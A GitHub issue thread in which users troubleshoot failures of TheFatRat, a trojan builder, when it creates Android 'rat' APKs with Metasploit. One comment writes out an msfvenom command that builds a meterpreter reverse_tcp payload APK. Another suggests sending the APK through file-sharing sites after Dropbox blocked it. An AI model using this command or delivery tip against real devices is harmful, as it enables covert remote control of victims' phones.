### ISSUE TITLE
apk payload

### ISSUE THREAD

**Issue by rohitadhikari143** [screetsec/TheFatRat#444]
There was a problem in the creation of your rat apk file , make sure your metasploit is running correctly

**Comment by peterpt** [comment]
your metasploit is probably not installed correctly and it is not running anywhere in your system .
if you get into fatrat folder and write in terminal "msfconsole" and if metasploit does not run or gives an error then that is the problem .

**Comment by erobern31** [comment]
> There was a problem in the creation of your rat apk file , make sure your metasploit is running correctly

use .apk after your apk's name it'll work...

**Comment by rohitadhikari143** [comment]
This did not helped. 😔-------- Original message --------From: erobern31 <notifications@github.com>Date: Sun, May 10, 2020, 10:24 PMTo: Screetsec/TheFatRat <TheFatRat@noreply.github.com>Cc: rohitadhikari143 <rohitadhikari143@gmail.com>, Author <author@noreply.github.com>Subject: Re: [Screetsec/TheFatRat] apk payload (#444)

There was a problem in the creation of your rat apk file , make sure your metasploit is running correctly

use .apk after your apk's name it'll work...

**Comment by dilligithub** [comment]
On creating step , it show " there was a problem to creation apk rat file . Make sure metasploit is running correctly " 

Same issue I have faced so kindly help to resolve.

**Comment by BLUE-444** [comment]
When I run the app  it stil 1.7kb And do not complete the download what's the problem ?

**Comment by peterpt** [comment]
I have no idea what you here think , but somehow you here must absolutely believe that error happens to me when i run fatrat . 
If i don't get those errors and i have no idea the steps you followed , then how would i even imagine on whats going on there !!!!
If you dont tell your steps to make that error happen and if you dont provide the apk you are working on then i wont be able to help you .

If you have no minimum knowledge of linux console then dont use fatrat .

**Comment by BLUE-444** [comment]
> I have no idea what you here think , but somehow you here must absolutely believe that error happens to me when i run fatrat . 
> If i don't get those errors and i have no idea the steps you followed , then how would i even imagine on whats going on there !!!!
> If you dont tell your steps to make that error happen and if you dont provide the apk you are working on then i wont be able to help you .
> 
> If you have no minimum knowledge of linux console then dont use fatrat .
> 
> 

![IMG_20210312_111632_635.jpg](https://user-images.githubusercontent.com/78936176/110926209-661a6800-8324-11eb-9354-2b08c31033d6.jpg)
The download remains like this, it does not continue and the application does not end.I have not erred in anything else.
(I am using metasploit)

**Comment by peterpt** [comment]
did you used fatrat for this ?
the latest version ?

**Comment by Rehan587** [comment]
Hi all.. I am a termux user. I am using up to date Rapid7 metasploit framework. I have reinstalled it sever times. I use this command below.
msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 R> /sdcard/payload.apk
After this, I don't get any sort of prompt about the file size or whatever, the file just gets created and when I try to install it, it doesn't work. The prompt says "there was a problem parsing the package" even after signing it. Pls help.

**Comment by shane89420** [comment]
Try using fileshare sites and download the APK that way...I used Dropbox

**Comment by Rehan587** [comment]
> Try using fileshare sites and download the APK that way...I used Dropbox

Can you explain me in a little depth? I have never done something like that..

**Comment by shane89420** [comment]
Basically google free file sharing sites Dropbox won't let u send the APK I had serious issue but u can do it on easyfileshare or any number of sites

**Comment by shane89420** [comment]
> did you used fatrat for this ?
> the latest version ?

I can't get it to install says ming64 issue won't let me fix it either...what do I do

**Comment by monamzubair** [comment]
![Screenshot_2022-10-24_20-16-01](https://user-images.githubusercontent.com/116575808/197555286-7a62ccb8-0eba-4f2b-91fa-a1bc01e2012d.png)
anyone tell me what is username or password

**Comment by SebiOnGitHub** [comment]
If you are using TCP, you don’t need to write at IP: tcp://
